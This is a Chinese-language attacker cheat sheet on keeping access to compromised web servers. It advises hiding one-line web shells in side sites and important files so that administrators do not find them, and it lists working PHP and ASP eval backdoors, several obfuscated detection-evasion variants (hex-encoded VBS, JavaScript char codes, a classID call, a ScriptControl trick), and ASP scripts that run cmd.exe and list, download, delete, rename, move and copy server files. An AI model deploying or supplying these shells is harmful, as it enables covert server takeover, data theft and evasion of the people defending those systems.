维持访问
WebShell
一般大马在管理员发现后后会被删除,上传一些隐蔽的一句话,或者功能简单的脚本。
如果有旁站的话,插入WebShell到旁站。一句话可以插入到某些重要文件中。
插入的时候最好加上判断,可防止报错
<?php if(isset($_POST['1'])){eval($_POST['1']);}?>
ASP
后缀名
ashx asp aspx ascx asmx
绕过检测的方式
如果wscript.xxxxxx不能使用,可以使用classID调用,这里classID各个版本各有不同
<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
一句话
一般一句话
<%eval request("MH")%>
<%eval request(chr(35))%>
<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>
编码一句话,不过还是没有去掉eval
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
利用<%%>和<script language=javascript runat=server></script>基本等价的道理,来去掉百分号。
使用VBS编码
<script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="&CHR(&H"
N=")"
Do While Len(data)>1
If IsNumeric(Left(data,1)) Then
HextoStr=HextoStr&C&Left(data,2)&N
data=Mid(data,3)
Else
HextoStr=HextoStr&C&Left(data,4)&N
data=Mid(data,5)
End If
Loop
End Function
</script>
使用JS编码
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>
使用ScriptControl,这个没有仔细测试
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>
url中输入
http://localhost/tmp.asp?
SubCode=sub e(Server,Response,Request,Application,Session,Error) eval(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))
或者菜刀配置中写入
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
遍历目录
<%@ Language=vbscript %>
<%
'遍历目录以及目录下文件的函数
%>
<%
Function Bianli(path,Recursion)
Set Fso=server.createobject("scripting.filesystemobject")
On Error Resume Next
Set Objfolder=fso.getfolder(path)
Set Objsubfolders=Objfolder.subfolders
Set Objfile = Objfolder.Files
Response.write path
For Each file in Objfile
Response.write "<br>---"
Response.write file.name
Next
For Each Objsubfolder In Objsubfolders
Response.write "<p>"
if Recursion<>0 then
call Bianli(path+"\"+Objsubfolder.name,Recursion) '递归
end if
Next
Set Objfolder=nothing
Set Objsubfolders=nothing
Set Fso=nothing
End Function
%>
<%
dim path,Recursion
path = request("path")
Recursion = request("Recursion")
call Bianli(path,Recursion) '遍历d:盘
%>
<html>
<p>Testing...</p>
</html>
下载文件
<%@ language=vbscript codepage=65001%>
<%
'Filename must be input
if Request("Filename")="" then
response.write "<h1>Error:</h1>Filename is empty!<p>"
else
call downloadFile(Request("Filename"))
Function downloadFile(strFile)
' make sure you are on the latest MDAC version for this to work
' get full path of specified file
'strFilename = server.MapPath(strFile)
strFilename = strFile
' clear the buffer
Response.Buffer = True
Response.Clear
' create stream
Set s = Server.CreateObject("ADODB.Stream")
s.Open
' Set as binary
s.Type = 1
' load in the file
on error resume next
' check the file exists
Set fso = Server.CreateObject("Scripting.FileSystemObject")
if not fso.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>"&strFilename&" does not exists!<p>")
Response.End
end if
' get length of file
Set f = fso.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>Unknown Error!<p>")
Response.End
end if
' send the headers to the users Browse
Response.AddHeader "Content-Disposition","attachment; filename="&f.name
Response.AddHeader "Content-Length",intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
' output the file to the browser
Response.BinaryWrite s.Read
Response.Flush
' tidy up
s.Close
Set s = Nothing
End Function
end if
%>
执行命令
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
自己上传cmd的话这样写
<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>
删除文件
<%
filepath=request("path")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(filepath)
Set fso = nothing
%>
重命名文件
<%
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(request("path"))
f.name =request("filename")
newname=f.name
response.write "已更名为"&newname
%>
移动文件
<%
dim fso
set fso = server.createobject("scripting.filesystemobject")
fso.movefolder request("name1"),request("name2")
set fso = nothing
%>
复制文件
<%
dim MyFSO
set MyFSO=Server.CreateObject("Scripting.FileSystemObject")
MyFSO.CopyFile request("name1"),request("name2")
set MyFSO=nothing
%>
</